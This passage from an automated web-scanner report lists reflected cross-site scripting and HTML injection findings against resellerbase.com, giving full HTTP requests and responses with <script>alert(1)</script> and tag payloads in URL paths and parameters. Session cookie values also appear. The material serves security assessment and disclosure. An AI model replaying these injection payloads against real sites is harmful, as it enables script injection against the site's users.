Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...3bda4<a>4487a87f624&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3808. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 30561<script>alert(1)</script>e017499f772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&30561<script>alert(1)</script>e017499f772=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&30561<script>alert(1)</script>e017499f772=1 was not found on this server.</p>
...[SNIP]...

2.3809. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eca2b<a>a5d80e4d776 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eca2b<a>a5d80e4d776 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2eca2b<a>a5d80e4d776 was not found on this server.</p>
...[SNIP]...

2.3810. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5e47<script>alert(1)</script>e450b815fb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila5e47<script>alert(1)</script>e450b815fb9/9/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila5e47<script>alert(1)</script>e450b815fb9/9/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3811. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5550<script>alert(1)</script>92fbe34dfa7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9d5550<script>alert(1)</script>92fbe34dfa7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9d5550<script>alert(1)</script>92fbe34dfa7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3812. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1ccaa<script>alert(1)</script>10da9946dcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes1ccaa<script>alert(1)</script>10da9946dcb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes1ccaa<script>alert(1)</script>10da9946dcb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3813. http://www.resellerbase.com/detail/9/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a4598<script>alert(1)</script>1d4ef00fc35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/search.phpa4598<script>alert(1)</script>1d4ef00fc35?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.phpa4598<script>alert(1)</script>1d4ef00fc35?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3814. http://www.resellerbase.com/detail/9/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b1722<a>b9ab4a9e5bc was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Searchb1722<a>b9ab4a9e5bc&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...&Submit3=Searchb1722<a>b9ab4a9e5bc&opt=2 was not found on this server.</p>
...[SNIP]...

2.3815. http://www.resellerbase.com/detail/9/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 4821d<a>7de9316a024 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/search.php?keyword=search...4821d<a>7de9316a024&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...4821d<a>7de9316a024&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3816. http://www.resellerbase.com/detail/9/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 962ec<script>alert(1)</script>12822a5e881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=2&962ec<script>alert(1)</script>12822a5e881=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=2&962ec<script>alert(1)</script>12822a5e881=1 was not found on this server.</p>
...[SNIP]...

2.3817. http://www.resellerbase.com/detail/9/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/9/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9a80e<a>b8af7cb074e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=29a80e<a>b8af7cb074e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=29a80e<a>b8af7cb074e was not found on this server.</p>
...[SNIP]...

2.3818. http://www.resellerbase.com/detail/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0d06<script>alert(1)</script>cfeb6fc8a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb0d06<script>alert(1)</script>cfeb6fc8a91/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb0d06<script>alert(1)</script>cfeb6fc8a91/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3819. http://www.resellerbase.com/detail/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cb59<script>alert(1)</script>39ffbb99dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/search.php8cb59<script>alert(1)</script>39ffbb99dd0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php8cb59<script>alert(1)</script>39ffbb99dd0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3820. http://www.resellerbase.com/detail/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1ab7c<a>95a3d3ee7a7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/search.php?keyword=search...&Submit3=Search1ab7c<a>95a3d3ee7a7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...&Submit3=Search1ab7c<a>95a3d3ee7a7&opt=2 was not found on this server.</p>
...[SNIP]...

2.3821. http://www.resellerbase.com/detail/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b8af9<a>6dd7d58604d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/search.php?keyword=search...b8af9<a>6dd7d58604d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...b8af9<a>6dd7d58604d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3822. http://www.resellerbase.com/detail/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3b8e<script>alert(1)</script>a3a7b02883d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/search.php?keyword=search...&Submit3=Search&opt=2&e3b8e<script>alert(1)</script>a3a7b02883d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...&Submit3=Search&opt=2&e3b8e<script>alert(1)</script>a3a7b02883d=1 was not found on this server.</p>
...[SNIP]...

2.3823. http://www.resellerbase.com/detail/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 217cd<a>54d35a25390 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/search.php?keyword=search...&Submit3=Search&opt=2217cd<a>54d35a25390 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/search.php?keyword=search...&Submit3=Search&opt=2217cd<a>54d35a25390 was not found on this server.</p>
...[SNIP]...

2.3824. http://www.resellerbase.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 807b4<script>alert(1)</script>34ce7c9041f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico807b4<script>alert(1)</script>34ce7c9041f HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /favicon.ico807b4<script>alert(1)</script>34ce7c9041f was not found on this server.</p>
...[SNIP]...

2.3825. http://www.resellerbase.com/get_rated.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b837<script>alert(1)</script>06bab65ddb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get_rated.php7b837<script>alert(1)</script>06bab65ddb HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /get_rated.php7b837<script>alert(1)</script>06bab65ddb was not found on this server.</p>
...[SNIP]...

2.3826. http://www.resellerbase.com/get_rated.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
